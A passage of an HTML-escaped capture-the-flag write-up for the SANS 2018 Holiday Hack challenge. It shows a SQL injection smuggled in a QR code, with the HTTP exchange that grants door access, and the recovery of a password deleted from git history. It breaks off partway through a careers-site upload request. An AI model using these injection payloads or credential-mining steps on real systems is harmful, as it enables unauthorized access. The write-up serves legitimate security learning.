class="mi"&gt;2000&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="n"&gt;qr&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;data&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;random_payload&lt;/span&gt;
&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="n"&gt;qr&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;encode&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;qr_random.png&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Here's the image that saved me:&lt;/p&gt;
&lt;img alt="qr_random.png" class="align-center" src="/images/sans-christmas-challenge-2018/qr_random.png" /&gt;
&lt;p&gt;I uploaded it, and fot the following error message:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt; &lt;span class="m"&gt;200&lt;/span&gt; &lt;span class="ne"&gt;OK&lt;/span&gt;
&lt;span class="na"&gt;Server&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;nginx/1.10.3&lt;/span&gt;
&lt;span class="na"&gt;Date&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Thu, 03 Jan 2019 13:37:14 GMT&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/json&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;433&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;

&lt;span class="hll"&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;data&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;EXCEPTION AT (LINE 96 \&amp;quot;user_info = query(\&amp;quot;SELECT first_name,last_name,enabled FROM employees WHERE authorized = 1 AND uid = &amp;#39;{}&amp;#39; LIMIT 1\&amp;quot;.format(uid))\&amp;quot;): (1064, u\&amp;quot;You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near &amp;#39;G7M]aa-!EcgKBlTx0&amp;amp;&amp;lt;50Y&amp;amp;\\rV&amp;#39;CEB@ZbfO2Z~HkVC5=lH6&amp;gt;!bSl^L~9(}Lh;T^-PXCShXg{ik3H%_ A\\x0c&amp;#39; at line 1\&amp;quot;)&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;request&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="kc"&gt;false&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;img alt="scanomatic_sql_error.gif" class="align-center" src="/images/sans-christmas-challenge-2018/scanomatic_sql_error.gif" /&gt;
&lt;p&gt;Hurray! A SQL error message, which gives us the full syntax. So there was
indeed a SQL injection, however I shouldn't have base64-encoded it. So here's
the request:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="n"&gt;first_name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;last_name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;enabled&lt;/span&gt; &lt;span class="k"&gt;FROM&lt;/span&gt; &lt;span class="n"&gt;employees&lt;/span&gt; &lt;span class="k"&gt;WHERE&lt;/span&gt; &lt;span class="n"&gt;authorized&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt; &lt;span class="k"&gt;AND&lt;/span&gt; &lt;span class="n"&gt;uid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;&amp;lt;id_goes_here&amp;gt;&amp;#39;&lt;/span&gt; &lt;span class="k"&gt;LIMIT&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Seems like your basic SQL injection, let's generate a paylaod that will select
the first enabled user:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="n"&gt;qr&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;data&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;foo&amp;#39; OR 1=1 AND enabled=&amp;#39;1&amp;quot;&lt;/span&gt;
&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="n"&gt;qr&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;encode&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;qr_sqli.png&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;With this payload, the SQL request will become:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="n"&gt;first_name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;last_name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;enabled&lt;/span&gt; &lt;span class="k"&gt;FROM&lt;/span&gt; &lt;span class="n"&gt;employees&lt;/span&gt; &lt;span class="k"&gt;WHERE&lt;/span&gt; &lt;span class="n"&gt;authorized&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt; &lt;span class="k"&gt;AND&lt;/span&gt; &lt;span class="n"&gt;uid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;foo&amp;#39;&lt;/span&gt; &lt;span class="k"&gt;OR&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt; &lt;span class="k"&gt;AND&lt;/span&gt; &lt;span class="n"&gt;enabled&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;1&amp;#39;&lt;/span&gt; &lt;span class="k"&gt;LIMIT&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This should return the first enabled user that is authorized to open the door.
Let's scan our evil QR code:&lt;/p&gt;
&lt;img alt="qr_sqli.png" class="align-center" src="/images/sans-christmas-challenge-2018/qr_sqli.png" /&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;POST&lt;/span&gt; &lt;span class="nn"&gt;/upload&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;scanomatic.kringlecastle.com&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0&lt;/span&gt;
&lt;span class="na"&gt;Accept&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/json, text/javascript, */*; q=0.01&lt;/span&gt;
&lt;span class="na"&gt;Accept-Language&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3&lt;/span&gt;
&lt;span class="na"&gt;Accept-Encoding&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;gzip, deflate&lt;/span&gt;
&lt;span class="na"&gt;Referer&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;https://scanomatic.kringlecastle.com/index.html&lt;/span&gt;
&lt;span class="na"&gt;X-Requested-With&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;XMLHttpRequest&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;multipart/form-data; boundary=---------------------------242929957373414110176704857&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;560&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;
&lt;span class="na"&gt;Cookie&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;resource_id=false&lt;/span&gt;

-----------------------------242929957373414110176704857
Content-Disposition: form-data; name=&amp;quot;barcode&amp;quot;; filename=&amp;quot;qr_sqli.png&amp;quot;
Content-Type: image/png

PNG [snip]
-----------------------------242929957373414110176704857
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt; &lt;span class="m"&gt;200&lt;/span&gt; &lt;span class="ne"&gt;OK&lt;/span&gt;
&lt;span class="na"&gt;Server&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;nginx/1.10.3&lt;/span&gt;
&lt;span class="na"&gt;Date&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Thu, 03 Jan 2019 13:42:19 GMT&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/json&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;179&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;

&lt;span class="hll"&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;data&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;User Access Granted - Control number 19880715&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;request&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="kc"&gt;true&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;success&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:{&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;hash&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;ff60055a84873cd7d75ce86cfaebd971ab90c86ff72d976ede0f5f04795e99eb&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;resourceId&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;false&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;}}&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;img alt="scanomatic_success.gif" class="align-center" src="/images/sans-christmas-challenge-2018/scanomatic_success.gif" /&gt;
&lt;p&gt;We get the control number, which is &lt;code&gt;19880715&lt;/code&gt;.&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="the-john-mcclane-way"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id29"&gt;The &amp;quot;John McClane&amp;quot; way&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;If you remember, we found schematics for the ventilation conducts in the North
Pole Git Repository. And it just so happens that next to Google's booth, there
is a ventilation conduct:&lt;/p&gt;
&lt;img alt="google_booth.png" class="align-center" src="/images/sans-christmas-challenge-2018/google_booth.png" /&gt;
&lt;p&gt;If you go inside, you can navigate the maze that is the ventilation conduct.&lt;/p&gt;
&lt;img alt="google_vent_maze.png" class="align-center" src="/images/sans-christmas-challenge-2018/google_vent_maze.png" /&gt;
&lt;p&gt;But we have a map! We can follow the schematics we found earlier. This allows
us to bypass the authentication door:&lt;/p&gt;
&lt;img alt="ventilation_diagram_1F_solution.jpg" class="align-center" src="/images/sans-christmas-challenge-2018/ventilation_diagram_1F_solution.jpg" /&gt;
&lt;img alt="ventilation_diagram_2F_solution.jpg" class="align-center" src="/images/sans-christmas-challenge-2018/ventilation_diagram_2F_solution.jpg" /&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="hr-incident-response"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id30"&gt;HR Incident Response&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Hans reveals his true plan:&lt;/p&gt;
&lt;img alt="hans.png" class="align-center" src="/images/sans-christmas-challenge-2018/hans.png" /&gt;
&lt;p&gt;&lt;em&gt;Hans says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;So, you’ve figured out my plan – it’s not about freeing those prisoners.&lt;/p&gt;
&lt;p&gt;The toy soldiers and I are here to steal the contents of Santa’s vault!&lt;/p&gt;
&lt;p&gt;You think that after all my posturing, all my little speeches, that I’m
nothing but a common thief.&lt;/p&gt;
&lt;p&gt;But, I tell you -- I am an exceptional thief.&lt;/p&gt;
&lt;p&gt;And since I've moved up to kidnapping all of you, you should be more
polite!&lt;/p&gt;
&lt;/blockquote&gt;
&lt;div class="section" id="sparkle-redberry-s-cranberry-pi-challenge"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id31"&gt;Sparkle Redberry's Cranberry Pi Challenge&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Sparkle Redberry committed her password to the local git repository. We have
to recover the password:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="go"&gt;                                   .0.&lt;/span&gt;
&lt;span class="go"&gt;                               .:llOXKllc.&lt;/span&gt;
&lt;span class="go"&gt;                                 .OXXXK,&lt;/span&gt;
&lt;span class="go"&gt;                                 &amp;#39;0l&amp;#39;cOc&lt;/span&gt;
&lt;span class="go"&gt;                                 ..&amp;#39;;&amp;#39;..&lt;/span&gt;
&lt;span class="go"&gt;                               .&amp;#39;;::::::&amp;#39;.&lt;/span&gt;
&lt;span class="go"&gt;                            .&amp;#39;:::::::::::::,.&lt;/span&gt;
&lt;span class="go"&gt;                         .&amp;#39;::loc::::::::::::::,.&lt;/span&gt;
&lt;span class="go"&gt;                      .&amp;#39;::::oMMNc::::::::::::::::,.&lt;/span&gt;
&lt;span class="go"&gt;                    .,;;,,,,:dxl:::::::,,,:::;,,,,,,.&lt;/span&gt;
&lt;span class="go"&gt;                    .,&amp;#39;  ..;:::::::::::;,;::::,.&lt;/span&gt;
&lt;span class="go"&gt;                      .&amp;#39;;::::::::::::::::::::dOxc,.&lt;/span&gt;
&lt;span class="go"&gt;                   .&amp;#39;;:::::::::okd::::::::::cXMWd:::,.&lt;/span&gt;
&lt;span class="go"&gt;                .&amp;#39;;:::::::::::cNMMo:::::::::::lc:::::::,.&lt;/span&gt;
&lt;span class="go"&gt;             .&amp;#39;::::::::::::::::col::::::::::::;:::::::::::,.&lt;/span&gt;
&lt;span class="go"&gt;                   .;:::,,,:::::::::::::::::;,,,:::::&amp;#39;.&lt;/span&gt;
&lt;span class="go"&gt;                .&amp;#39;::::::;;;:::::::::::dko:::::;::::::::;.&lt;/span&gt;
&lt;span class="go"&gt;             .,::::::::::::::::::::::lWMWc::::::::::::::::;.&lt;/span&gt;
&lt;span class="go"&gt;            ..:00:...;::::loc:::::::::coc::::::::::::&amp;#39;.;;.....&lt;/span&gt;
&lt;span class="go"&gt;              :NNl.,:::::xMMX:::::::::::::::::::::::::;,,.&lt;/span&gt;
&lt;span class="go"&gt;               .,::::::::cxxl::::,,,:::::::::::::::::::::;.&lt;/span&gt;
&lt;span class="go"&gt;            .,:::::::c:::::::::::;;;:::::::;;:::::kNXd::::::;.&lt;/span&gt;
&lt;span class="go"&gt;         .,::::::::cKMNo::::::::::::::::::;,,;::::xKKo:::::::::;.&lt;/span&gt;
&lt;span class="go"&gt;       .&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;,:::::x0Oc:::::::::oOOo:::::::::::::::::::::;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;.&lt;/span&gt;
&lt;span class="go"&gt;            .,:::::::::::::::::::kWWk::::::::::::::ldl:::::;&amp;#39;.&lt;/span&gt;
&lt;span class="go"&gt;         .,::;,,::::::::::::::::::::::::::::::::::lMMMl:::::::;&amp;#39;.&lt;/span&gt;
&lt;span class="go"&gt;      .,:::::;,;:::::::::::::::::::::::::::::::::::ldl::::::::::::&amp;#39;.&lt;/span&gt;
&lt;span class="go"&gt;   .,::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::&amp;#39;.&lt;/span&gt;
&lt;span class="go"&gt;                               ..;;;;;;;;&amp;#39;.&lt;/span&gt;
&lt;span class="go"&gt;                             .&amp;#39;;;;;;;;;;;;;&amp;#39;.&lt;/span&gt;
&lt;span class="go"&gt;                          .&amp;#39;;;;;;;;;;;;;;;;;;;&amp;#39;.&lt;/span&gt;
&lt;span class="go"&gt;                         ........................&lt;/span&gt;



&lt;span class="go"&gt;Coalbox again, and I&amp;#39;ve got one more ask.&lt;/span&gt;
&lt;span class="go"&gt;Sparkle Q. Redberry has fumbled a task.&lt;/span&gt;
&lt;span class="go"&gt;Git pull and merging, she did all the day;&lt;/span&gt;
&lt;span class="go"&gt;With all this gitting, some creds got away.&lt;/span&gt;

&lt;span class="go"&gt;Urging - I scolded, &amp;quot;Don&amp;#39;t put creds in git!&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;She said, &amp;quot;Don&amp;#39;t worry - you&amp;#39;re having a fit.&lt;/span&gt;
&lt;span class="go"&gt;If I did drop them then surely I could,&lt;/span&gt;
&lt;span class="go"&gt;Upload some new code done up as one should.&amp;quot;&lt;/span&gt;

&lt;span class="go"&gt;Though I would like to believe this here elf,&lt;/span&gt;
&lt;span class="go"&gt;I&amp;#39;m worried we&amp;#39;ve put some creds on a shelf.&lt;/span&gt;
&lt;span class="go"&gt;Any who&amp;#39;s curious might find our &amp;quot;oops,&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;Please find it fast before some other snoops!&lt;/span&gt;

&lt;span class="go"&gt;Find Sparkle&amp;#39;s password, then run the runtoanswer tool.&lt;/span&gt;
&lt;span class="gp"&gt;elf@fa3b5d8290f0:~$&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Let's see the git repository and check the commit history:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@76d904959962:~$&lt;/span&gt; ls -lh
&lt;span class="go"&gt;total 5.7M&lt;/span&gt;
&lt;span class="go"&gt;drwxr-xr-x 1 elf elf 4.0K Nov 14 09:48 kcconfmgmt&lt;/span&gt;
&lt;span class="go"&gt;-rwxr-xr-x 1 elf elf 5.7M Dec 14 16:13 runtoanswer&lt;/span&gt;
&lt;span class="gp"&gt;elf@76d904959962:~$&lt;/span&gt; &lt;span class="nb"&gt;cd&lt;/span&gt; kcconfmgmt/
&lt;span class="gp"&gt;elf@76d904959962:~/kcconfmgmt$&lt;/span&gt; git log &lt;span class="p"&gt;|&lt;/span&gt; grep -i -C &lt;span class="m"&gt;5&lt;/span&gt; password

&lt;span class="go"&gt;commit d84b728c7d9cf7f9bafc5efb9978cd0e3122283d&lt;/span&gt;
&lt;span class="go"&gt;Author: Sparkle Redberry &amp;lt;sredberry@kringlecon.com&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;Date:   Sat Nov 10 19:51:52 2018 -0500&lt;/span&gt;

&lt;span class="go"&gt;    Add user model for authentication, bcrypt password storage&lt;/span&gt;

&lt;span class="go"&gt;commit c27135005753f6dde3511a7e70eb27f92f67393f&lt;/span&gt;
&lt;span class="go"&gt;Author: Sparkle Redberry &amp;lt;sredberry@kringlecon.com&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;Date:   Sat Nov 10 08:11:40 2018 -0500&lt;/span&gt;

&lt;span class="go"&gt;--&lt;/span&gt;

&lt;span class="go"&gt;commit 60a2ffea7520ee980a5fc60177ff4d0633f2516b&lt;/span&gt;
&lt;span class="go"&gt;Author: Sparkle Redberry &amp;lt;sredberry@kringlecon.com&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;Date:   Thu Nov 8 21:11:03 2018 -0500&lt;/span&gt;

&lt;span class="hll"&gt;&lt;span class="go"&gt;    Per @tcoalbox admonishment, removed username/password from config.js, default settings in config.js.def need to be updated before use&lt;/span&gt;
&lt;/span&gt;
&lt;span class="go"&gt;commit b2376f4a93ca1889ba7d947c2d14be9a5d138802&lt;/span&gt;
&lt;span class="go"&gt;Author: Sparkle Redberry &amp;lt;sredberry@kringlecon.com&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;Date:   Thu Nov 8 13:25:32 2018 -0500&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Apparently, in commit &lt;code&gt;60a2ffea7520ee980a5fc60177ff4d0633f2516b&lt;/code&gt;, Sparkle
removed her password from the &lt;code&gt;config.js&lt;/code&gt; file, which was replaced by a
default &lt;code&gt;config.js.def&lt;/code&gt;. Let's see where this file is:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@76d904959962:~/kcconfmgmt$&lt;/span&gt; find . -name config.js.def
&lt;span class="go"&gt;./server/config/config.js.def&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now that we know where it is, we can guess where the original &lt;code&gt;config.js&lt;/code&gt;
file was. Let's check it's modification history:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@eba657fc7961:~/kcconfmgmt$&lt;/span&gt; git log -p -- ./server/config/config.js
&lt;span class="go"&gt;commit 60a2ffea7520ee980a5fc60177ff4d0633f2516b&lt;/span&gt;
&lt;span class="go"&gt;Author: Sparkle Redberry &amp;lt;sredberry@kringlecon.com&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;Date:   Thu Nov 8 21:11:03 2018 -0500&lt;/span&gt;
&lt;span class="go"&gt;    Per @tcoalbox admonishment, removed username/password from config.js, default settings in c&lt;/span&gt;
&lt;span class="go"&gt;onfig.js.def need to be updated before use&lt;/span&gt;
&lt;span class="go"&gt;diff --git a/server/config/config.js b/server/config/config.js&lt;/span&gt;
&lt;span class="go"&gt;deleted file mode 100644&lt;/span&gt;
&lt;span class="go"&gt;index 25be269..0000000&lt;/span&gt;
&lt;span class="go"&gt;--- a/server/config/config.js&lt;/span&gt;
&lt;span class="go"&gt;+++ /dev/null&lt;/span&gt;
&lt;span class="go"&gt;@@ -1,4 +0,0 @@&lt;/span&gt;
&lt;span class="go"&gt;-// Database URL&lt;/span&gt;
&lt;span class="go"&gt;-module.exports = {&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;-    &amp;#39;url&amp;#39; : &amp;#39;mongodb://sredberry:twinkletwinkletwinkle@127.0.0.1:27017/node-api&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;-};&lt;/span&gt;
&lt;span class="go"&gt;[snip]&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We find our commit &lt;code&gt;60a2ffea7520ee980a5fc60177ff4d0633f2516b&lt;/code&gt;, which
deletes the file, and gives us the content of the original &lt;code&gt;config.js&lt;/code&gt;
file. Sparkle's password is &lt;code&gt;twinkletwinkletwinkle&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@fa3b5d8290f0:~$&lt;/span&gt; ./runtoanswer
&lt;span class="go"&gt;Loading, please wait......&lt;/span&gt;



&lt;span class="hll"&gt;&lt;span class="go"&gt;Enter Sparkle Redberry&amp;#39;s password: twinkletwinkletwinkle&lt;/span&gt;
&lt;/span&gt;

&lt;span class="go"&gt;This ain&amp;#39;t &amp;quot;I told you so&amp;quot; time, but it&amp;#39;s true:&lt;/span&gt;
&lt;span class="go"&gt;I shake my head at the goofs we go through.&lt;/span&gt;
&lt;span class="go"&gt;Everyone knows that the gits aren&amp;#39;t the place;&lt;/span&gt;
&lt;span class="go"&gt;Store your credentials in some safer space.&lt;/span&gt;

&lt;span class="go"&gt;Congratulations!&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="elf-infosec-careers-website"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id32"&gt;Elf InfoSec Careers Website&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;We're asked to take a look at the &lt;a class="reference external" href="https://careers.kringlecastle.com/"&gt;Elf InfoSec Careers website&lt;/a&gt;. It's a website where you can upload
your application, and if your profile is interesting enough, you can join
Santa's elves! The goal is to get the content of the
&lt;code&gt;C:\candidate_evaluation.docx&lt;/code&gt; file.&lt;/p&gt;
&lt;p&gt;Let's fill an application. You must provide your full name, phone number,
email address, and a CSV file with your work history:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;POST&lt;/span&gt; &lt;span class="nn"&gt;/api/upload/application&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;careers.kringlecastle.com&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0&lt;/span&gt;
&lt;span class="na"&gt;Accept&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;*/*&lt;/span&gt;
&lt;span class="na"&gt;Accept-Language&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3&lt;/span&gt;
&lt;span class="na"&gt;Accept-Encoding&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;gzip, deflate&lt;/span&gt;
&lt;span class="na"&gt;Referer&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;https://careers.kringlecastle.com/&lt;/span&gt;
&lt;span class="na"&gt;X-Requested-With&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;XMLHttpRequest&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;multipart/form-data; boundary=---------------------------1284099169763381272238033&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;683&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;

-----------------------------1284099169763381272238033
Content-Disposition: form-data; name=&amp;quot;firstname&amp;quot;

Foo
-----------------------------1284099169763381272238033
Content-Disposition: form-data; name=&amp;quot;lastname&amp;quot;

Bar
-----------------------------1284099169763381272238033
